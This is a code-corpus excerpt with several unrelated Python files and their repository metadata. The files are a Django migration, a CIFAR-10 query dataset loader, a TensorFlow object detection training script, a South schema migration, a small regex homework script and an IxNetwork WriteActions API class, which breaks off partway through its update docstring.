# Generated by Django 3.2.3 on 2021-05-26 06:52
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('accounts', '0128_auto_20210520_1129'),
]
operations = [
migrations.AlterField(
model_name='car',
name='car_number',
field=models.CharField(default='TEGA26052021770', max_length=200, primary_key=True, serialize=False, verbose_name='Corrective action no.:'),
),
migrations.AlterField(
model_name='employees',
name='employeeID',
field=models.CharField(default='TEGA831', max_length=10, primary_key=True, serialize=False, verbose_name='Employee ID'),
),
]
|
[
"mutebe2@gmail.com"
] |
mutebe2@gmail.com
|
57fc7cebd01728f8421be44aefcb47b90b42b206
|
ef9effb573816b7678b8da5dda541f640cffc3e0
|
/data/CIFAR10_test_query.py
|
f104e3f691ddcc847dd486b75dbcffcbc6f075fd
|
[] |
no_license
|
yinianqingzhi/PQN
|
c0a3d835e9898803e8b056b45f0a5560c840165f
|
ba7724b8d97d8c42a44e61a2edd0a64e4f5be1ab
|
refs/heads/master
| 2020-04-07T19:46:07.102174
| 2018-11-22T07:52:05
| 2018-11-22T07:52:05
| 158,661,765
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,624
|
py
|
from __future__ import print_function
from PIL import Image
import os
import os.path
import numpy as np
import sys
if sys.version_info[0] == 2:
import cPickle as pickle
else:
import pickle
import torch.utils.data as data
# from .utils import download_url, check_integrity
import random
class CIFAR10_test_query(data.Dataset):
"""`CIFAR10 <https://www.cs.toronto.edu/~kriz/cifar.html>`_ Dataset.
Args:
root (string): Root directory of dataset where directory
``cifar-10-batches-py`` exists or will be saved to if download is set to True.
train (bool, optional): If True, creates dataset from training set, otherwise
creates from test set.
transform (callable, optional): A function/transform that takes in an PIL image
and returns a transformed version. E.g, ``transforms.RandomCrop``
target_transform (callable, optional): A function/transform that takes in the
target and transforms it.
        query_num (int, optional): Number of shuffled test images reserved as
            queries; the remaining test images form the retrieval base.
"""
base_folder = 'cifar-10-batches-py'
url = "https://www.cs.toronto.edu/~kriz/cifar-10-python.tar.gz"
filename = "cifar-10-python.tar.gz"
tgz_md5 = 'c58f30108f718f92721af3b95e74349a'
train_list = [
['data_batch_1', 'c99cafc152244af753f735de768cd75f'],
['data_batch_2', 'd4bba439e000b95fd0a9bffe97cbabec'],
['data_batch_3', '54ebc095f3ab1f0389bbae665268c751'],
['data_batch_4', '634d18415352ddfa80567beed471001a'],
['data_batch_5', '482c414d41f54cd18b22e5b47cb7c3cb'],
]
test_list = [
['test_batch', '40351d587109b95175f43aff81a1287e'],
]
def __init__(self, root, train=True,
transform=None, target_transform=None,
query_num=1000):
self.root = os.path.expanduser(root)
self.transform = transform
self.target_transform = target_transform
self.train = train # training set or test set
# if download:
# self.download()
# if not self._check_integrity():
# raise RuntimeError('Dataset not found or corrupted.' +
# ' You can use download=True to download it')
# now load the picked numpy arrays
if self.train:
self.train_data = []
self.train_labels = []
for fentry in self.train_list:
f = fentry[0]
file = os.path.join(self.root, self.base_folder, f)
fo = open(file, 'rb')
if sys.version_info[0] == 2:
entry = pickle.load(fo)
else:
entry = pickle.load(fo, encoding='latin1')
self.train_data.append(entry['data'])
if 'labels' in entry:
self.train_labels += entry['labels']
else:
self.train_labels += entry['fine_labels']
fo.close()
self.train_data = np.concatenate(self.train_data)
self.train_data = self.train_data.reshape((50000, 3, 32, 32))
self.train_data = self.train_data.transpose((0, 2, 3, 1)) # convert to HWC
else:
f = self.test_list[0][0]
file = os.path.join(self.root, self.base_folder, f)
fo = open(file, 'rb')
if sys.version_info[0] == 2:
entry = pickle.load(fo)
else:
entry = pickle.load(fo, encoding='latin1')
self.test_data = entry['data']
if 'labels' in entry:
self.test_labels = entry['labels']
else:
self.test_labels = entry['fine_labels']
fo.close()
self.test_data = self.test_data.reshape((10000, 3, 32, 32))
self.test_data = self.test_data.transpose((0, 2, 3, 1)) # convert to HWC
perm = np.arange(10000)
random.shuffle(perm)
self.query_index = perm[:query_num]
self.base_index = perm[query_num:]
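            # the shuffled test indices are split into `query_num` query images
            # and the remaining base images; __getitem__ serves only the query split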
def __getitem__(self, index):
"""
Args:
index (int): Index
Returns:
tuple: (image, target) where target is index of the target class.
"""
if self.train:
img, target = self.train_data[index], self.train_labels[index]
else:
img, target = self.test_data[self.query_index[index]], self.test_labels[self.query_index[index]]
# doing this so that it is consistent with all other datasets
# to return a PIL Image
img = Image.fromarray(img)
if self.transform is not None:
img = self.transform(img)
if self.target_transform is not None:
target = self.target_transform(target)
return img, target
def __len__(self):
if self.train:
return len(self.train_data)
else:
return len(self.query_index)
# def _check_integrity(self):
# root = self.root
# for fentry in (self.train_list + self.test_list):
# filename, md5 = fentry[0], fentry[1]
# fpath = os.path.join(root, self.base_folder, filename)
# if not check_integrity(fpath, md5):
# return False
# return True
# def download(self):
# import tarfile
#
# if self._check_integrity():
# print('Files already downloaded and verified')
# return
#
# root = self.root
# download_url(self.url, root, self.filename, self.tgz_md5)
#
# # extract file
# cwd = os.getcwd()
# tar = tarfile.open(os.path.join(root, self.filename), "r:gz")
# os.chdir(root)
# tar.extractall()
# tar.close()
# os.chdir(cwd)
def __repr__(self):
fmt_str = 'Dataset ' + self.__class__.__name__ + '\n'
fmt_str += ' Number of datapoints: {}\n'.format(self.__len__())
tmp = 'train' if self.train is True else 'test'
fmt_str += ' Split: {}\n'.format(tmp)
fmt_str += ' Root Location: {}\n'.format(self.root)
tmp = ' Transforms (if any): '
fmt_str += '{0}{1}\n'.format(tmp, self.transform.__repr__().replace('\n', '\n' + ' ' * len(tmp)))
tmp = ' Target Transforms (if any): '
fmt_str += '{0}{1}'.format(tmp, self.target_transform.__repr__().replace('\n', '\n' + ' ' * len(tmp)))
return fmt_str
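# A minimal usage sketch (root path and transform are illustrative assumptions):
# import torchvision.transforms as transforms
# query_set = CIFAR10_test_query(root='./data', train=False,
#                                transform=transforms.ToTensor(), query_num=1000)
# img, target = query_set[0]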
|
[
"2622786022@qq.com"
] |
2622786022@qq.com
|
cfb27aa31eff40e7e67b086f392c63700528a5a7
|
dd12e0765060a05ab0a824f46177732e8dd7ca39
|
/models/research/object_detection/train.py
|
d36a1e8a8a99904262489eeeff66906feab65856
|
[
"Apache-2.0"
] |
permissive
|
jsqiaoliang/w9-github
|
828e24c931ae545297ea9ab21931bfdbca188580
|
af35993a0884ce1b78f73c1a307911e9d8f53dad
|
refs/heads/master
| 2022-11-11T04:37:05.382092
| 2018-06-30T00:49:01
| 2018-06-30T00:49:01
| 139,206,271
| 0
| 1
| null | 2022-10-22T13:05:19
| 2018-06-30T00:07:14
|
Python
|
UTF-8
|
Python
| false
| false
| 6,812
|
py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
r"""Training executable for detection models.
This executable is used to train DetectionModels. There are two ways of
configuring the training job:
1) A single pipeline_pb2.TrainEvalPipelineConfig configuration file
can be specified by --pipeline_config_path.
Example usage:
./train \
--logtostderr \
--train_dir=path/to/train_dir \
--pipeline_config_path=pipeline_config.pbtxt
2) Three configuration files can be provided: a model_pb2.DetectionModel
configuration file to define what type of DetectionModel is being trained, an
input_reader_pb2.InputReader file to specify what training data will be used and
a train_pb2.TrainConfig file to configure training parameters.
Example usage:
./train \
--logtostderr \
--train_dir=path/to/train_dir \
--model_config_path=model_config.pbtxt \
--train_config_path=train_config.pbtxt \
--input_config_path=train_input_config.pbtxt
"""
import functools
import json
import os
import tensorflow as tf
from object_detection import trainer
from object_detection.builders import dataset_builder
from object_detection.builders import graph_rewriter_builder
from object_detection.builders import model_builder
from object_detection.utils import config_util
from object_detection.utils import dataset_util
tf.logging.set_verbosity(tf.logging.INFO)
flags = tf.app.flags
flags.DEFINE_string('master', '', 'Name of the TensorFlow master to use.')
flags.DEFINE_integer('task', 0, 'task id')
flags.DEFINE_integer('num_clones', 1, 'Number of clones to deploy per worker.')
flags.DEFINE_boolean('clone_on_cpu', False,
'Force clones to be deployed on CPU. Note that even if '
'set to False (allowing ops to run on gpu), some ops may '
'still be run on the CPU if they have no GPU kernel.')
flags.DEFINE_integer('worker_replicas', 1, 'Number of worker+trainer '
'replicas.')
flags.DEFINE_integer('ps_tasks', 0,
'Number of parameter server tasks. If None, does not use '
'a parameter server.')
flags.DEFINE_string('train_dir', '',
'Directory to save the checkpoints and training summaries.')
flags.DEFINE_string('pipeline_config_path', '',
'Path to a pipeline_pb2.TrainEvalPipelineConfig config '
'file. If provided, other configs are ignored')
flags.DEFINE_string('train_config_path', '',
'Path to a train_pb2.TrainConfig config file.')
flags.DEFINE_string('input_config_path', '',
'Path to an input_reader_pb2.InputReader config file.')
flags.DEFINE_string('model_config_path', '',
'Path to a model_pb2.DetectionModel config file.')
FLAGS = flags.FLAGS
def main(_):
assert FLAGS.train_dir, '`train_dir` is missing.'
if FLAGS.task == 0: tf.gfile.MakeDirs(FLAGS.train_dir)
if FLAGS.pipeline_config_path:
configs = config_util.get_configs_from_pipeline_file(
FLAGS.pipeline_config_path)
if FLAGS.task == 0:
tf.gfile.Copy(FLAGS.pipeline_config_path,
os.path.join(FLAGS.train_dir, 'pipeline.config'),
overwrite=True)
else:
configs = config_util.get_configs_from_multiple_files(
model_config_path=FLAGS.model_config_path,
train_config_path=FLAGS.train_config_path,
train_input_config_path=FLAGS.input_config_path)
if FLAGS.task == 0:
for name, config in [('model.config', FLAGS.model_config_path),
('train.config', FLAGS.train_config_path),
('input.config', FLAGS.input_config_path)]:
tf.gfile.Copy(config, os.path.join(FLAGS.train_dir, name),
overwrite=True)
model_config = configs['model']
train_config = configs['train_config']
input_config = configs['train_input_config']
model_fn = functools.partial(
model_builder.build,
model_config=model_config,
is_training=True)
def get_next(config):
return dataset_util.make_initializable_iterator(
dataset_builder.build(config)).get_next()
create_input_dict_fn = functools.partial(get_next, input_config)
env = json.loads(os.environ.get('TF_CONFIG', '{}'))
cluster_data = env.get('cluster', None)
cluster = tf.train.ClusterSpec(cluster_data) if cluster_data else None
task_data = env.get('task', None) or {'type': 'master', 'index': 0}
task_info = type('TaskSpec', (object,), task_data)
# Parameters for a single worker.
ps_tasks = 0
worker_replicas = 1
worker_job_name = 'lonely_worker'
task = 0
is_chief = True
master = ''
if cluster_data and 'worker' in cluster_data:
# Number of total worker replicas include "worker"s and the "master".
worker_replicas = len(cluster_data['worker']) + 1
if cluster_data and 'ps' in cluster_data:
ps_tasks = len(cluster_data['ps'])
if worker_replicas > 1 and ps_tasks < 1:
raise ValueError('At least 1 ps task is needed for distributed training.')
if worker_replicas >= 1 and ps_tasks > 0:
# Set up distributed training.
server = tf.train.Server(tf.train.ClusterSpec(cluster), protocol='grpc',
job_name=task_info.type,
task_index=task_info.index)
if task_info.type == 'ps':
server.join()
return
worker_job_name = '%s/task:%d' % (task_info.type, task_info.index)
task = task_info.index
is_chief = (task_info.type == 'master')
master = server.target
graph_rewriter_fn = None
if 'graph_rewriter_config' in configs:
graph_rewriter_fn = graph_rewriter_builder.build(
configs['graph_rewriter_config'], is_training=True)
trainer.train(
create_input_dict_fn,
model_fn,
train_config,
master,
task,
FLAGS.num_clones,
worker_replicas,
FLAGS.clone_on_cpu,
ps_tasks,
worker_job_name,
is_chief,
FLAGS.train_dir,
graph_hook_fn=graph_rewriter_fn)
if __name__ == '__main__':
tf.app.run()
|
[
"809402755@qq.com"
] |
809402755@qq.com
|
4eebb4950c40548137f7a1e945c05bc727b4d459
|
9de6d807ee4569f8829ee77135dfdab0edfb52f0
|
/contenidos/migrations/0016_auto__add_field_libro_editorial__add_field_libro_tipo__add_field_libro.py
|
b4aedad1aaf553fdb78f07925547cc5c0ec6d5a0
|
[] |
no_license
|
dev-fjn/Fundacion
|
2d21155c74adc0a9049941c0796311bf407b07b1
|
f9053c09fbfd607273e44e4688bdb7302134f3f0
|
HEAD
| 2016-09-16T11:53:48.960224
| 2014-06-17T16:14:29
| 2014-06-17T16:14:29
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,136
|
py
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Libro.editorial'
db.add_column(u'contenidos_libro', 'editorial',
self.gf('django.db.models.fields.CharField')(default='(Escribir editorial)', max_length=250),
keep_default=False)
# Adding field 'Libro.tipo'
db.add_column(u'contenidos_libro', 'tipo',
self.gf('django.db.models.fields.CharField')(default='Libro', max_length=40),
keep_default=False)
# Adding field 'Libro.pais'
db.add_column(u'contenidos_libro', 'pais',
self.gf('django.db.models.fields.CharField')(default=u'Espa\xc3\xb1a', max_length=40),
keep_default=False)
# Changing field 'Libro.miniatura'
db.alter_column(u'contenidos_libro', 'miniatura', self.gf('filebrowser.fields.FileBrowseField')(max_length=200, null=True))
def backwards(self, orm):
# Deleting field 'Libro.editorial'
db.delete_column(u'contenidos_libro', 'editorial')
# Deleting field 'Libro.tipo'
db.delete_column(u'contenidos_libro', 'tipo')
# Deleting field 'Libro.pais'
db.delete_column(u'contenidos_libro', 'pais')
# User chose to not deal with backwards NULL issues for 'Libro.miniatura'
raise RuntimeError("Cannot reverse this migration. 'Libro.miniatura' and its values cannot be restored.")
# The following code is provided here to aid in writing a correct migration
# Changing field 'Libro.miniatura'
db.alter_column(u'contenidos_libro', 'miniatura', self.gf('django.db.models.fields.files.ImageField')(max_length=100))
models = {
u'contenidos.audioadjunto': {
'Meta': {'object_name': 'AudioAdjunto'},
'audio': ('filebrowser.fields.FileBrowseField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'documento': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenidos.Documento']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'titulo': ('django.db.models.fields.CharField', [], {'max_length': '250'})
},
u'contenidos.documento': {
'Meta': {'object_name': 'Documento'},
'descripcion': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'tipo': ('django.db.models.fields.IntegerField', [], {}),
'titulo': ('django.db.models.fields.CharField', [], {'max_length': '250'})
},
u'contenidos.evento': {
'Meta': {'object_name': 'Evento'},
'fecha_y_lugar': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'imagen': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'pdf': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'resumen': ('django.db.models.fields.TextField', [], {}),
'titulo': ('django.db.models.fields.CharField', [], {'max_length': '250'})
},
u'contenidos.fechaevento': {
'Meta': {'object_name': 'FechaEvento'},
'evento': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenidos.Evento']"}),
'fecha': ('django.db.models.fields.DateField', [], {}),
'hora_final': ('django.db.models.fields.TimeField', [], {}),
'hora_inicio': ('django.db.models.fields.TimeField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
u'contenidos.imagen': {
'Meta': {'ordering': "('orden',)", 'object_name': 'Imagen'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'imagen': ('filebrowser.fields.FileBrowseField', [], {'max_length': '200'}),
'orden': ('django.db.models.fields.IntegerField', [], {'default': '20'}),
'titulo': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'titulo_en': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True', 'blank': 'True'}),
'titulo_es': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True', 'blank': 'True'})
},
u'contenidos.libro': {
'Meta': {'object_name': 'Libro'},
'autor': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'editorial': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'fecha': ('django.db.models.fields.DateField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'isbn': ('django.db.models.fields.CharField', [], {'max_length': '13'}),
'miniatura': ('filebrowser.fields.FileBrowseField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'pais': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'precio': ('django.db.models.fields.FloatField', [], {}),
'resumen': ('django.db.models.fields.TextField', [], {}),
'tipo': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'titulo': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'})
},
u'contenidos.pdfadjunto': {
'Meta': {'object_name': 'PdfAdjunto'},
'documento': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenidos.Documento']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'pdf': ('filebrowser.fields.FileBrowseField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'titulo': ('django.db.models.fields.CharField', [], {'max_length': '250'})
},
u'contenidos.urladjunto': {
'Meta': {'object_name': 'UrlAdjunto'},
'documento': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenidos.Documento']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'titulo': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200'})
},
u'contenidos.video': {
'Meta': {'object_name': 'Video'},
'flv': ('filebrowser.fields.FileBrowseField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mp4': ('filebrowser.fields.FileBrowseField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'titulo': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'titulo_en': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True', 'blank': 'True'}),
'titulo_es': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True', 'blank': 'True'})
},
u'contenidos.videoadjunto': {
'Meta': {'object_name': 'VideoAdjunto'},
'documento': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenidos.Documento']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'titulo': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'video': ('filebrowser.fields.FileBrowseField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'})
}
}
complete_apps = ['contenidos']
|
[
"fjn_dev@fundacionjuannegrin.com"
] |
fjn_dev@fundacionjuannegrin.com
|
cfccf2f5b9e4e5cf01fe4e18d2ba20b35a0ecfb3
|
8d3235b0a7212c9089667c8858026996d7349e1f
|
/Test2/work.py
|
d64e7a620677b10287bed95d07774c1ec2640441
|
[] |
no_license
|
kategavrishina/homework4prog
|
7c5c129b0c35854ef29b6d1359e24da5435c7f87
|
0182f91f77c317392e7a9deaf5bd802f380f95f0
|
refs/heads/master
| 2018-09-06T13:50:19.952523
| 2018-06-19T09:34:57
| 2018-06-19T09:34:57
| 103,937,939
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,181
|
py
|
# Variant 1
import re
import collections
def first(filename):
lines = 0
with open(filename, 'r', encoding = 'utf-8') as f:
text = f.read()
text = re.sub('<text>.+?', ' ', text)
    for line in text.splitlines():
        lines += 1
    with open('result.txt', 'w', encoding = 'utf-8') as g:
        g.write(str(lines))
def second(filename):
with open(filename, 'r', encoding = 'utf-8') as f:
text = f.read()
a = re.findall('<w lemma=".+?" type="(.+?)">', text)
d = collections.Counter()
for word in a:
d[word] += 1
    # not sure how to write the dictionary to a file, so just print it
print(dict(d))
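    # one possible way to write the counts to a file instead (a sketch, not in
    # the original):
    # with open('types.txt', 'w', encoding='utf-8') as g:
    #     for word_type, count in d.items():
    #         g.write('{}\t{}\n'.format(word_type, count))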
def third(filename):
with open(filename, 'r', encoding = 'utf-8') as f:
text = f.read()
a = re.findall('type="f.h.+?">(.+?)</w>', text)
a = ', '.join(a)
with open('result.txt', 'a', encoding = 'utf-8') as h:
h.write(a)
def main():
return first('razm.xml'), second('razm.xml'), third('razm.xml')
if __name__=='__main__':
main()
|
[
"noreply@github.com"
] |
kategavrishina.noreply@github.com
|
87c54eb66d5d84191cb938250febc8f6e93c66bd
|
1c6283303ceb883add8de4ee07c5ffcfc2e93fab
|
/Jinja2/lib/python3.7/site-packages/ixnetwork_restpy/testplatform/sessions/ixnetwork/vport/protocols/writeactions_b6ffad884e16fd072bdbe0c697cc514e.py
|
bebad5f05592157f45ad6a78e307f0ca57195d62
|
[] |
no_license
|
pdobrinskiy/devcore
|
0f5b3dfc2f3bf1e44abd716f008a01c443e14f18
|
580c7df6f5db8c118990cf01bc2b986285b9718b
|
refs/heads/main
| 2023-07-29T20:28:49.035475
| 2021-09-14T10:02:16
| 2021-09-14T10:02:16
| 405,919,390
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 11,181
|
py
|
# MIT LICENSE
#
# Copyright 1997 - 2020 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
from typing import List, Any, Union
class WriteActions(Base):
"""If selected, Write Actions instruction is supported.
The WriteActions class encapsulates a required writeActions resource which will be retrieved from the server every time the property is accessed.
"""
__slots__ = ()
_SDM_NAME = 'writeActions'
_SDM_ATT_MAP = {
'CopyTtlIn': 'copyTtlIn',
'CopyTtlOut': 'copyTtlOut',
'DecrementMplsTtl': 'decrementMplsTtl',
'DecrementNetworkTtl': 'decrementNetworkTtl',
'Group': 'group',
'Output': 'output',
'PopMpls': 'popMpls',
'PopPbb': 'popPbb',
'PopVlan': 'popVlan',
'PushMpls': 'pushMpls',
'PushPbb': 'pushPbb',
'PushVlan': 'pushVlan',
'SetField': 'setField',
'SetMplsTtl': 'setMplsTtl',
'SetNetworkTtl': 'setNetworkTtl',
'SetQueue': 'setQueue',
}
_SDM_ENUM_MAP = {
}
def __init__(self, parent, list_op=False):
super(WriteActions, self).__init__(parent, list_op)
@property
def CopyTtlIn(self):
# type: () -> bool
"""
Returns
-------
- bool: If selected, table supports Copy TTL In Write Actions.
"""
return self._get_attribute(self._SDM_ATT_MAP['CopyTtlIn'])
@CopyTtlIn.setter
def CopyTtlIn(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP['CopyTtlIn'], value)
@property
def CopyTtlOut(self):
# type: () -> bool
"""
Returns
-------
- bool: If selected, table supports Copy TTL Out Write Actions.
"""
return self._get_attribute(self._SDM_ATT_MAP['CopyTtlOut'])
@CopyTtlOut.setter
def CopyTtlOut(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP['CopyTtlOut'], value)
@property
def DecrementMplsTtl(self):
# type: () -> bool
"""
Returns
-------
- bool: If selected, table supports Decrement MPLS TTL Write Actions.
"""
return self._get_attribute(self._SDM_ATT_MAP['DecrementMplsTtl'])
@DecrementMplsTtl.setter
def DecrementMplsTtl(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP['DecrementMplsTtl'], value)
@property
def DecrementNetworkTtl(self):
# type: () -> bool
"""
Returns
-------
- bool: If selected, table supports Decrement Network TTL Write Actions.
"""
return self._get_attribute(self._SDM_ATT_MAP['DecrementNetworkTtl'])
@DecrementNetworkTtl.setter
def DecrementNetworkTtl(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP['DecrementNetworkTtl'], value)
@property
def Group(self):
# type: () -> bool
"""
Returns
-------
- bool: If selected, table supports Group Write Actions.
"""
return self._get_attribute(self._SDM_ATT_MAP['Group'])
@Group.setter
def Group(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP['Group'], value)
@property
def Output(self):
# type: () -> bool
"""
Returns
-------
- bool: If selected, table supports Output Write Actions.
"""
return self._get_attribute(self._SDM_ATT_MAP['Output'])
@Output.setter
def Output(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP['Output'], value)
@property
def PopMpls(self):
# type: () -> bool
"""
Returns
-------
- bool: If selected, table supports Pop MPLS Write Actions.
"""
return self._get_attribute(self._SDM_ATT_MAP['PopMpls'])
@PopMpls.setter
def PopMpls(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP['PopMpls'], value)
@property
def PopPbb(self):
# type: () -> bool
"""
Returns
-------
- bool: If selected, table supports Pop PBB Write Actions.
"""
return self._get_attribute(self._SDM_ATT_MAP['PopPbb'])
@PopPbb.setter
def PopPbb(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP['PopPbb'], value)
@property
def PopVlan(self):
# type: () -> bool
"""
Returns
-------
- bool: If selected, table supports Pop VLAN Write Actions.
"""
return self._get_attribute(self._SDM_ATT_MAP['PopVlan'])
@PopVlan.setter
def PopVlan(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP['PopVlan'], value)
@property
def PushMpls(self):
# type: () -> bool
"""
Returns
-------
- bool: If selected, table supports Push MPLS Write Actions.
"""
return self._get_attribute(self._SDM_ATT_MAP['PushMpls'])
@PushMpls.setter
def PushMpls(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP['PushMpls'], value)
@property
def PushPbb(self):
# type: () -> bool
"""
Returns
-------
- bool: If selected, table supports Push PBB Write Actions.
"""
return self._get_attribute(self._SDM_ATT_MAP['PushPbb'])
@PushPbb.setter
def PushPbb(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP['PushPbb'], value)
@property
def PushVlan(self):
# type: () -> bool
"""
Returns
-------
- bool: If selected, table supports Push VLAN Write Actions.
"""
return self._get_attribute(self._SDM_ATT_MAP['PushVlan'])
@PushVlan.setter
def PushVlan(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP['PushVlan'], value)
@property
def SetField(self):
# type: () -> bool
"""
Returns
-------
- bool: If selected, table supports Set Field Write Actions.
"""
return self._get_attribute(self._SDM_ATT_MAP['SetField'])
@SetField.setter
def SetField(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP['SetField'], value)
@property
def SetMplsTtl(self):
# type: () -> bool
"""
Returns
-------
- bool: If selected, table supports Set MPLS TTL Write Actions.
"""
return self._get_attribute(self._SDM_ATT_MAP['SetMplsTtl'])
@SetMplsTtl.setter
def SetMplsTtl(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP['SetMplsTtl'], value)
@property
def SetNetworkTtl(self):
# type: () -> bool
"""
Returns
-------
- bool: If selected, table supports Set Network TTL Write Actions.
"""
return self._get_attribute(self._SDM_ATT_MAP['SetNetworkTtl'])
@SetNetworkTtl.setter
def SetNetworkTtl(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP['SetNetworkTtl'], value)
@property
def SetQueue(self):
# type: () -> bool
"""
Returns
-------
- bool: If selected, table supports Set Queue Write Actions.
"""
return self._get_attribute(self._SDM_ATT_MAP['SetQueue'])
@SetQueue.setter
def SetQueue(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP['SetQueue'], value)
def update(self, CopyTtlIn=None, CopyTtlOut=None, DecrementMplsTtl=None, DecrementNetworkTtl=None, Group=None, Output=None, PopMpls=None, PopPbb=None, PopVlan=None, PushMpls=None, PushPbb=None, PushVlan=None, SetField=None, SetMplsTtl=None, SetNetworkTtl=None, SetQueue=None):
# type: (bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool, bool) -> WriteActions
"""Updates writeActions resource on the server.
Args
----
- CopyTtlIn (bool): If selected, table supports Copy TTL In Write Actions.
- CopyTtlOut (bool): If selected, table supports Copy TTL Out Write Actions.
- DecrementMplsTtl (bool): If selected, table supports Decrement MPLS TTL Write Actions.
- DecrementNetworkTtl (bool): If selected, table supports Decrement Network TTL Write Actions.
- Group (bool): If selected, table supports Group Write Actions.
- Output (bool): If selected, table supports Output Write Actions.
- PopMpls (bool): If selected, table supports Pop MPLS Write Actions.
- PopPbb (bool): If selected, table supports Pop PBB Write Actions.
- PopVlan (bool): If selected, table supports Pop VLAN Write Actions.
- PushMpls (bool): If selected, table supports Push MPLS Write Actions.
- PushPbb (bool): If selected, table supports Push PBB Write Actions.
- PushVlan (bool): If selected, table supports Push VLAN Write Actions.
- SetField (bool): If selected, table supports Set Field Write Actions.
- SetMplsTtl (bool): If selected, table supports Set MPLS TTL Write Actions.
